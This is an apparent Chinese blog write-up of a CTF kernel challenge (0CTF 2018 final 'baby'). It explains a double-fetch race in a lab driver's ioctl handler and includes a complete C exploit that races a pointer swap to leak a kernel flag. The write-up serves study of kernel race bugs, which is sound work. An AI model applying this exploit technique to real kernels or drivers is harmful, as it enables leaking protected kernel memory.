

<!DOCTYPE html>
<html lang="">
<head>
  


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>kernel_pwn Double_fetch [ An9Ela ]</title>

  <link rel="icon" href="/img/favicon.ico">


    <meta name="author" content="An9Ela">





  <link rel="alternate" href="/atom.xml " title="An9Ela" type="application/atom+xml">


  
    <link rel="stylesheet" href="/css/main.css">
  

<meta name="generator" content="Hexo 6.2.0"></head>
  <body data-theme="light" class="notransition">
    <script>
      const body = document.body;
      const data = body.getAttribute("data-theme");
      const initTheme = (state) => {
        if (state === "dark") {
          body.setAttribute("data-theme", "dark");
        } else if (state === "light") {
          body.removeAttribute("data-theme");
        } else {
          localStorage.setItem("theme", data);
        }
      };
   
      initTheme(localStorage.getItem("theme"));
      
      setTimeout(() => body.classList.remove("notransition"), 75);
    </script>
  <div class="navbar" role="navigation">
    <nav class="menu">
      <input type="checkbox" id="menu-trigger" class="menu-trigger" />
      <label for="menu-trigger">
        <span class="menu-icon">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 512 512"
          >
            <path
              d="M64,384H448V341.33H64Zm0-106.67H448V234.67H64ZM64,128v42.67H448V128Z"
            />
          </svg>
        </span>
      </label>
      <a id="mode">
        <svg
          class="mode-sunny"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>LIGHT</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
        <svg
          class="mode-moon"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>DARK</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
      </a>
      <div class="trigger">
        <div class="trigger-container">
          
            
            
            
            
            
            
            <a class="menu-link " href="/"> Home</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/about/"> About</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/archives/"> Archives</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/tags/"> Tags</a>
          
        </div>
      </div>
    </nav>
  </div>
  
<div class="wrapper post">
  <main class="page-content" aria-label="Content">
      <header class="header">
        
          <div class="tags">
            <a href="/tags/CTF/" class="tag"># CTF</a><a href="/tags/KERNEL/" class="tag"># KERNEL</a>
          </div>
        
        <h1 class="header-title" itemprop="headline">kernel_pwn Double_fetch</h1>
          <div class="post-meta">
            <time>Nov 08, 2020</time>
            <span itemprop="author">
              <span itemprop="name">An9Ela</span>
            </span>
          </div>
        </header>

          <div class="page-content"><h3 id="kernel-pwn-Double-fetch"><a href="#kernel-pwn-Double-fetch" class="headerlink" title="kernel_pwn Double_fetch"></a>kernel_pwn Double_fetch</h3><blockquote>
<p>wiki上kernel部分的第三道题目，来自0ctf2018 final_baby</p>
</blockquote>
<span id="more"></span>
<p>这题不太一样的是没有给bzlmage,只给了.ko文件和core.cpio。通过ida打开ko文件查看hex view可以发现内核版本为4.15.0-22-generic SMP mod_unload。<br>我偷懒直接从p4nda师傅的github上搞了一个，写个shell文件就可以qemu起了。</p>
<p>.ko文件分析：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">init_module</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  _fentry__();</span><br><span class="line">  misc_register(&amp;baby);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>init_module()里执行了misc_register()在&#x2F;dev目录下建立了baby结点，并定义为杂项设备，该设备共享主设备号和open函数调用，有点类似上一篇的core。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">baby_ioctl</span><span class="params">(__int64 a1, <span class="type">int</span> a2)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int64 v2; <span class="comment">// rdx</span></span><br><span class="line">  __int64 v3; <span class="comment">// rcx</span></span><br><span class="line">  __int64 result; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// kr10_8</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp-5Ch] [rbp-5Ch]</span></span><br><span class="line">  __int64 v7; <span class="comment">// [rsp-58h] [rbp-58h]</span></span><br><span class="line"></span><br><span class="line">  _fentry__();</span><br><span class="line">  v7 = v2;</span><br><span class="line">  <span class="keyword">if</span> ( a2 == <span class="number">0x6666</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    printk(<span class="string">&quot;Your flag is at %px! But I don&#x27;t think you know it&#x27;s content\n&quot;</span>, flag, v2, v3);</span><br><span class="line">    result = <span class="number">0LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( a2 == <span class="number">0x1337</span></span><br><span class="line">         &amp;&amp; (<span class="type">unsigned</span> __int8)_chk_range_not_ok(</span><br><span class="line">                               v2,</span><br><span class="line">                               <span class="number">16LL</span>,</span><br><span class="line">                               *(_QWORD *)(__readgsqword((<span class="type">unsigned</span> __int64)&amp;current_task) + <span class="number">4952</span>)) != <span class="number">1</span></span><br><span class="line">         &amp;&amp; (<span class="type">unsigned</span> __int8)_chk_range_not_ok(</span><br><span class="line">                               *(_QWORD *)v7,</span><br><span class="line">                               *(<span class="type">int</span> *)(v7 + <span class="number">8</span>),</span><br><span class="line">                               *(_QWORD *)(__readgsqword((<span class="type">unsigned</span> __int64)&amp;current_task) + <span class="number">4952</span>)) != <span class="number">1</span></span><br><span class="line">         &amp;&amp; *(_DWORD *)(v7 + <span class="number">8</span>) == <span class="built_in">strlen</span>(flag) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; ; ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      v5 = <span class="built_in">strlen</span>(flag) + <span class="number">1</span>;</span><br><span class="line">      <span class="keyword">if</span> ( i &gt;= v5 - <span class="number">1</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">if</span> ( *(_BYTE *)(*(_QWORD *)v7 + i) != flag[i] )</span><br><span class="line">        <span class="keyword">return</span> <span class="number">22LL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    printk(<span class="string">&quot;Looks like the flag is not a secret anymore. So here is it %s\n&quot;</span>, flag, flag, ~v5);</span><br><span class="line">    result = <span class="number">0LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="number">14LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>baby_ioctl()就类似于main函数了，主要完成的功能是对第二个参数进行检查，若为0x6666，就输出内核里flag的地址；如果为0x1337就会进行三个检查_chk_range_not_ok()函数就是检查a1+a2&gt;a3是否成立。</p>
<p>寄存器状态：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$rdx   : 0x00007ffffffff000  →  0x00007ffffffff000</span><br><span class="line">$rsi   : 0x0000000000000010  →  0x0000000000000010</span><br><span class="line">$rdi   : 0x00007ffd64e1d780  →  0x00007ffd64e1d790  →  0x6373205d30383138  →  0x6373205d30383138</span><br><span class="line"></span><br><span class="line">gef➤  x/20gx 0x00007ffd64e1d780</span><br><span class="line">0x7ffd64e1d780:	0x00007ffd64e1d790	0x0000000000000021   //传入的结构体</span><br></pre></td></tr></table></figure>

<p>通过调试我们可以发现，v2&#x2F;v7就是是我们传入的结构体，而a3则是一个固定的地址0x7ffffffff000，这个地址是用户空间和内核空间的边界地址，因此我们可以想到该函数就是判断a1+a2的是否在用户空间。<br>结构体：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">attr</span>&#123;</span></span><br><span class="line">    <span class="type">char</span> *flag;   <span class="comment">//flag的地址</span></span><br><span class="line">    <span class="type">size_t</span> flag_len;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>第一个check是我们输入的结构体是否在用户空间，第二个check是flag是否在用户空间，第三个check是我们结构体的flag_len是否和真正flag长度相等。<br>过了check之后会将我们输入的flag的地址里的内容和内核里的flag进行比较，相同最终就会输出flag。<br>分析下来我们发现，内核得到的是一个结构体的指针，而结构体的内容是存放在用户空间的。我们可以先通过0x6666得到flag在内核里的地址，但如果我们在传入的结构体里写入该地址的话就无法通过第二个check（因为该flag在内核空间）。这里就用到了doubel_fetch方法。<br>原理摘自CTF_WIKI：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Double Fetch 从漏洞原理上属于条件竞争漏洞，是一种内核态与用户态之间的数据访问竞争。</span><br><span class="line"></span><br><span class="line">在 Linux 等现代操作系统中，虚拟内存地址通常被划分为内核空间和用户空间。内核空间负责运行内核代码、驱动模块代码等，权限较高。而用户空间运行用户代码，并通过系统调用进入内核完成相关功能。通常情况下，用户空间向内核传递数据时，内核先通过通过 copy_from_user 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理，但在输入数据较为复杂时，内核可能只引用其指针，而将数据暂时保存在用户空间进行后续处理。此时，该数据存在被其他恶意线程篡改风险，造成内核验证通过数据与实际使用数据不一致，导致内核代码执行异常。</span><br></pre></td></tr></table></figure>
<p>因此我们可以先在结构体的flag位置写入用户空间的地址，在创建一个恶意线程，该线程的任务就是不断的修改我们的flag地址为内核地址，如果该修改操作发生在通过check后，那么就可以通过后面的依次比较从而输出flag。</p>
<p>exp:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;inttypes.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> finish=<span class="number">0</span>;</span><br><span class="line"><span class="type">uint64_t</span> addr;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">attr</span>&#123;</span></span><br><span class="line">    <span class="type">char</span> *flag;</span><br><span class="line">    <span class="type">int</span> len;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">change_attr</span><span class="params">(<span class="type">void</span> *s)</span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">attr</span> *<span class="title">s1</span>=</span>s;</span><br><span class="line">    <span class="keyword">if</span>(finish==<span class="number">0</span>)&#123;</span><br><span class="line">        s1-&gt;flag=addr;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">0x1000</span>]=&#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="type">char</span> *ptr;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">attr</span> <span class="title">t</span>;</span></span><br><span class="line">    <span class="type">pthread_t</span> t1;</span><br><span class="line">    <span class="type">int</span> fd=open(<span class="string">&quot;/dev/baby&quot;</span>,<span class="number">0</span>);</span><br><span class="line">    ioctl(fd,<span class="number">0x6666</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stdin</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stdout</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stderr</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">0</span>);</span><br><span class="line">    system(<span class="string">&quot;dmesg &gt; /tmp/record.txt&quot;</span>);</span><br><span class="line">    <span class="type">int</span> addr_fd=open(<span class="string">&quot;/tmp/record.txt&quot;</span>,O_RDONLY);</span><br><span class="line">    lseek(addr_fd,<span class="number">-0x1000</span>,SEEK_END);   <span class="comment">//control the position of r/w</span></span><br><span class="line">    read(addr_fd,buf,<span class="number">0x1000</span>);</span><br><span class="line">    close(addr_fd);</span><br><span class="line">    ptr=<span class="built_in">strstr</span>(buf,<span class="string">&quot;Your flag is at &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(ptr==<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Not found&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        ptr+=<span class="number">16</span>;</span><br><span class="line">        addr=strtoull(ptr,ptr+<span class="number">16</span>,<span class="number">16</span>);</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;flag addr: %p&quot;</span>,addr);</span><br><span class="line">    &#125;</span><br><span class="line">    t.flag=buf;</span><br><span class="line">    t.len=<span class="number">33</span>;</span><br><span class="line">    pthread_create(&amp;t1,<span class="literal">NULL</span>,change_attr,&amp;t);   <span class="comment">//创建线程</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;<span class="number">0x500</span>;i++)&#123;</span><br><span class="line">        ioctl(fd,<span class="number">0x1337</span>,&amp;t);</span><br><span class="line">        t.flag=buf;     <span class="comment">//更新flag地址增大成功概率</span></span><br><span class="line">    &#125;</span><br><span class="line">    finish=<span class="number">1</span>;</span><br><span class="line">    pthread_join(t1,<span class="literal">NULL</span>);   <span class="comment">//等待线程结束</span></span><br><span class="line">    close(fd);</span><br><span class="line">    system(<span class="string">&quot;dmesg | grep flag&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>补充：<br>编译时要多加-pthread选项<code>gcc exp.c -pthread -static -o exploit</code><br>gef attach的命令<code>gef-remote -q localhost:1234</code><br>关闭地址随机化方法：<br>在-append最后加上 nokaslr</p>
<p>参考：<br><a target="_blank" rel="noopener" href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/double-fetch-zh/">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/double-fetch-zh/</a><br><a target="_blank" rel="noopener" href="https://x3h1n.github.io/2019/08/27/20180ctf-final-baby/">https://x3h1n.github.io/2019/08/27/20180ctf-final-baby/</a></p>
</div>
          <nav class="post-nav">
    
    <a class="post-nav-item post-nav-prev" href="/2020/11/09/kernel_pwn(3)/">
      <div class="nav-arrow">&lt;&nbsp;NEWER</div>
      <span class="post-title">kernel_pwn UAF</span>
    </a>
    
    
    <a class="post-nav-item post-nav-next" href="/2020/11/07/kernel_pwn(1)/">
      <div class="nav-arrow">OLDER&nbsp;&gt;</div>
      <span class="post-title">kernel_pwn ROP</span>
    </a>
    
  </nav>

   </main>
</div>

  <footer class="footer">
    <small class="footer_copyright">
      <div id="bottom-inner">
        © 2021 Site by An9Ela using
        <a target="_blank" rel="noopener" href="http://hexo.io">hexo blog framework</a>.
        <br>
        <p> Theme is <a href="https://github.com/dewjohn/hexo-theme-klise">Klise</a></p>
      </div>
    </small>
  </footer>
  
  

    
      <script src="/js/main.js"></script>
    
  
  <script>
    window.FPConfig = {
      delay: 0,
      ignoreKeywords: [],
      maxRPS: 3,
      hoverDelay: 50,
    };
  </script>
  <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
</body>
</html>
